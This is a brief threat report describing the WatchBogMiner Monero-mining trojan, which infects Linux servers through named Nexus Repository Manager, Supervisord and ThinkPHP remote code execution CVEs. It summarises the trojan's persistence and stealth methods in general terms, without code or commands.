WatchBogMiner Trojan launched a vulnerability attack and has controlled mining on tens of thousands of Linux servers. The Trojan uses remote code execution vulnerabilities in server components such as Nexus Repository Manager, Supervisord, ThinkPHP, etc. to attack, installs various types of persistent attack codes on the lost machine, and then implants Monero mining Trojans for mining. Based on the computing resources used by the Trojan, it is speculated that tens of thousands of Linux servers have been controlled by hackers. The Trojan saves malicious code through the third-party website Pastebin to avoid detection, and persists through various methods. It regularly pulls the mining Trojan and loads it into memory for execution. At the same time, it deletes the Trojan file after startup to achieve the purpose of “stealth”. Similar to other mining Trojans, WatchBogMiner will clear other mining Trojans to monopolize the server when mining.
The exploited vulnerabilities include CVE-2019-7238 – Nexus Repository Manager 3 Remote Code Execution Vulnerability, CVE-2017-11610 – Supervisord Remote Command Execution Vulnerability and CVE-2018-20062 – ThinkPHP Remote Code Execution Vulnerability.